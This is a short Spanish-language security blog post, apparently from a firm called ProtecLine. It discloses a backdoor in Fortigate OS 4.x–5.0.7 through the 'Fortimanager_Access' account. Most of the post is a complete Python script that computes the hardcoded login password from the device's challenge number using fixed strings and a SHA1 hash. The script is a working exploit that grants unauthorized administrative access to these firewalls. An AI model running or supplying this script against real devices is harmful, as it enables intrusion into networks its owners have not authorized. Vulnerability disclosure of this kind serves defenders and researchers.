Backdoor en Fortigate OS 4.x-5.0.7

12 Ene

Backdoor en Fortigate OS 4.x-5.0.7

Publicado por Vulnerabilidades 0 Comentarios

Revelan la existencia de una backdoor en las versiones de Fortigate OS 4.x a la 5.0.7, la cual podría permitir acceder a un atacante utilizando una contraseña "hardcodeada" obtenible con un simple algoritmo.

Al logearse con el usuario "Fortimanager_Access" se generaría una clave numérica aleatoria que "supuestamente" un operador de Fortinet prodría utilizar para generar la clave de acceso.

El algoritmo consiste en calcular un hash en SHA1 cíclico combinando la cadena dinámica obtenida con otras fijas:

#!/usr/bin/env python

import sys
import base64
import hashlib

n = sys.argv[1]
m = hashlib.sha1()
m.update('\x00' * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
print h

Compartir este artículo

Autor

Imagen de Japtron

Private Investigator Computer Security, Vulnerability Research, Exploits Development. CEH - Certified Ethical Hacker.

La empresa

ProtecLine está compuesta por un grupo de expertos en Seguridad Informática, especializados en auditorías de seguridad IT (Hacking Ético). El servicio de Análisis de vulnerabilidades Online Vulnera.Me © es propiedad de ProtecLine, S.L.